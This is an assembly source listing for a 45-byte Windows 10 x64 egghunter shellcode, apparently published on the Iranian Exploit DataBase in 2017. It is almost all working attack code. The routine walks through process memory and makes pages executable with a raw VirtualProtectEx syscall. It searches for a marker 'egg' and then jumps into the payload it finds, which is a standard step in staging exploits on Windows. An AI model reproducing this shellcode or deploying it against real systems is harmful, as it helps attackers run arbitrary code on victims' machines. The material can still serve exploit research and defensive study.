###########################

# Windows 10 x64 Egghunter Shellcode (45 bytes)

###########################

PUBLIC Win10egghunterx64
 
.code
 
Win10egghunterx64 PROC
 
_start:
    push 7fh
    pop rdi                               ; RDI is nonvolatile, so it will be preserved after syscalls
 
_setup:                   
    inc rdi                                ; parameter 1 - lpAddress - counter
    mov r9b,40h                      ; parameter 3 - flNewProtect - 0x40 PAGE_EXECUTE_READWRITE                           
    pop rsi                                ; Stack alignment before the stack setup
    pop rsi    
    push rdi                            
    push rsp
    pop rdx                                ; pointer to lpAddress
    push 08h                            ; parameter 2 - dwSize 0x8
    push rsp
    pop r8                                ; pointer to dwSize going to r8 - can be exchanged with mov r8,rsp 
    mov [rdx+20h],rsp             ; parameter 4 - lpflOldprotect                     
    dec r10                                ; parameter 5 - hProcess - the handle will be -1, if not set you'll get a c0000008 error                              
_VirtualProtectEx:
     
    push 50h                            ; 0x50h for Windows 10 and Windows Server 2016 x64, 0x4Dh for Windows 7 family
    pop rax
    syscall
 
_rc_check:
 
    cmp al,01h                            ; check the response for non-allocated memory
    jge _setup
 
_end:                                    ; There won't be too many of these eggs in the memory
     
    mov eax, 042303042h                    ; the egg
    scasd
    jnz _setup
    jmp rdi
 
Win10egghunterx64 ENDP
END

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2017-04-07]

###########################